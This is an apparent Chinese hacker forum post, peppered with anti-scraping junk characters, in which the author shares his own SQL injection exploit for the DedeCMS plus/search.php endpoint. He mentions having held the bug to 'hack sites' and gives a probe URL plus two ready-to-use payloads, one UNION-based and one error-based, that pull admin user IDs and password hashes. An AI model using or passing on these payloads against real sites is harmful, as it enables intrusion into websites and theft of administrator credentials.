转载不加作者名的没JJ
. G/ `" g( Z2 P; j6 A; \
$ G8 o& [4 w; V7 }9 {' r哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。2 U+ e. C3 D Q6 ~' F; o
U J! v, q* R8 F9 A1 t既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
% s3 |- z, H% _
j5 r) ^ a! B" T# S我一般是这样测试的:
6 R4 m8 i$ [8 q" O% `6 L8 D' m7 R# b9 c; E
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
' {9 ?9 ~9 S0 i9 i# G
+ \! _1 l. e7 B" P/ W% P! g转载不加作者名的没JJ5 u- E K% t4 d8 ^ Z G
+ n/ C/ f/ T' v# ]2 ~作者:鬼哥4 |+ I" `' e# R$ g- N: d0 `& t2 G
/ O* G- m' c: R8 N: A d4 J1 N
' ^1 d2 d# L( b! @/ g( Z0 b+ ^
% K( S/ [+ p8 `* k. b2 t$ }& @# j看结果如果提示
2 G5 z1 g# x0 F1 f* Q' X" K2 i& q% U
% k2 g, L' M% M, k# g# HSafe Alert: Request Error step 2 !! i% n. Q! s5 \6 R
! G. L" {) O! S2 n: }% m那么直接用下面的exp- _! f; g% l% P" m4 U( y
0 P! G' X I; {: g" Z8 ^% {xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a" L. F" K4 @+ ~. v
0 W, k7 o& Q- U: B2 }5 p
9 X) x& H' G! l9 q$ O4 l看结果如果提示
3 q6 L! j* O3 S, T6 d
5 _. o/ R) J" E& r9 Q. f! bSafe Alert: Request Error step 1 !: D: F3 u0 j- o7 ~- ?
1 m5 m9 ]; m& H3 w1 i+ ^
那么直接用下面的exp
W) d* l# R- R* J$ @9 o \, e& g
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a8 {8 I4 f, f: D+ f! l3 \4 }
( a& L6 D( Q( R, [2 p7 B
; I- Q9 o% n: a如果正常显示证明漏洞不存在了。' |5 @' b4 @$ p. e- N( G5 e
3 L1 s3 Y; W* t1 n转载不加作者名的没JJ |